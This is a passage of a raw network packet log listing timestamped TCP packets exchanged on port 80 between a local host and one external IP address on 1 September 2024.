Sep 1, 2024 06:28:05.105988979 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105998039 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.105998993 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.106014967 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.106039047 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.106787920 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.106798887 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.106806993 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.106816053 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.106827021 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.106833935 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.106836081 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.106848001 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.106857061 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.106863022 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.106867075 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.106877089 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.106887102 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.106892109 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.106897116 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.106906891 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.106909990 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.106916904 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.106933117 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.106951952 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.107665062 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.107676983 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.107686996 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.107697964 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.107707977 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.107709885 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.107717991 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.107728958 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.107738018 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.107742071 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.107753992 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.107764006 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.107767105 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.107774019 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.107784033 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.107784986 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.107793093 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.107801914 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.107804060 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.107812881 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.107826948 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.107851028 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.108577967 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.108588934 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.108598948 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.108608961 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.108618975 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.108619928 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.108628988 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.108639002 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.108648062 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.108655930 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.108664989 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.108673096 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.108705997 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.109241962 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.109253883 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.109262943 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.109272957 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.109276056 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.109287024 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.109292030 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.109297037 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.109306097 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.109317064 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.109325886 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.109327078 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.109335899 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.109337091 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.109347105 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.109357119 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.109366894 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.109369040 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.109376907 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.109378099 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.109386921 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.109390020 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.109405041 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.109436989 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.110178947 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110188961 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110198021 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110205889 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.110208035 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110215902 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.110219002 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110229015 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110239029 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110249043 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110258102 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110265970 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.110268116 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110276937 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110286951 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110291004 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.110296011 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110306025 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110311031 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.110316992 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110327959 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110331059 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.110359907 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.110934019 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110945940 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110955000 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110965014 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110974073 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.110975027 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110986948 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110996962 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.110997915 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.111007929 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.111017942 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.111057043 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.111078024 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.130723000 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.130765915 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.130778074 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.130880117 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.130937099 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.130948067 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.130958080 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.130970001 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.130986929 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.131002903 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.132531881 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.132580042 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.132663012 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.132674932 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.132700920 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.132721901 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.132725000 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.132735968 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.132746935 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.132755995 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.132761002 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.132766962 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.132771969 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.132787943 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.132811069 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.133100986 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.133111000 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.133121014 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.133131981 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.133141041 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.133146048 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.133152008 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.133169889 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.133188009 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.133781910 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.133793116 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.133804083 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.133821964 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.133838892 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.134198904 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.134210110 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.134223938 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.134233952 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.134242058 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.134244919 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.134260893 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.134288073 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.134387016 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.134396076 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.134406090 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.134414911 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.134422064 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.134426117 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.134444952 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.134448051 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.134473085 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.134501934 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.134628057 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.134641886 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.134651899 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.134663105 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.134669065 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.134684086 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.134712934 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.134747028 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.134757996 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.134768009 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.134776115 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.134784937 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.134818077 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.136889935 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.136900902 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.136913061 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.136921883 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.136933088 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.136936903 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.136943102 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.136954069 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.136961937 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.136975050 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.136992931 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.136993885 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.137029886 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.137115002 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.137156963 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.137320042 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.137330055 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.137339115 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.137351036 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.137362957 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.137387991 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.137551069 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.137561083 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.137578011 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.137587070 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.137593985 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.137597084 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.137608051 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.137620926 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.137629032 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.137649059 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.137810946 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.137820959 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.137829065 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.137840033 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.137849092 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.137852907 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.137876987 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.137892008 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.138622999 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.138633013 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.138643980 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.138664961 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.138688087 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.138751984 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.138793945 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.138946056 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.138956070 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.138971090 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.138978958 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.138988018 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.138997078 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.139008999 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.190192938 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.190202951 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.190208912 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.190275908 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.190284014 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.190285921 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.190291882 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.190303087 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.190329075 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.190361977 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.190454006 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.190495014 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.190987110 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.190998077 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.191010952 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.191032887 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.191061974 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.191117048 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.191128016 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.191143036 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.191154003 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.191155910 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.191167116 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.191193104 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.191333055 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.191375971 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.191390991 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.191404104 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.191415071 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.191428900 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.191442966 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.191462994 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.191634893 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.191656113 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.191668034 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.191684961 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.191693068 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.191709995 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.191740036 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.193280935 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.193337917 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.193448067 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.193458080 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.193464041 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.193470955 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.193475962 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.193481922 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.193526983 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.193676949 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.193686962 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.193696976 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.193721056 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.193732023 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.193821907 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.193833113 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.193842888 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.193855047 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.193866014 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.193881989 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.193881989 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.193900108 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.194114923 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.194133997 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.194144964 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.194150925 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.194156885 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.194165945 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.194168091 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.194175959 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.194186926 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.194190025 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.194199085 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.194216013 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.194226980 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.194259882 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.218462944 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.218513012 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.218533993 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.218544006 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.218585968 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.219388962 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.219398975 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.219408989 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.219427109 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.219448090 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.219584942 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.219624996 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:05.220391989 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.220402002 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:05.220407963 CEST	80	49705	185.215.113.16	192.168.2.5
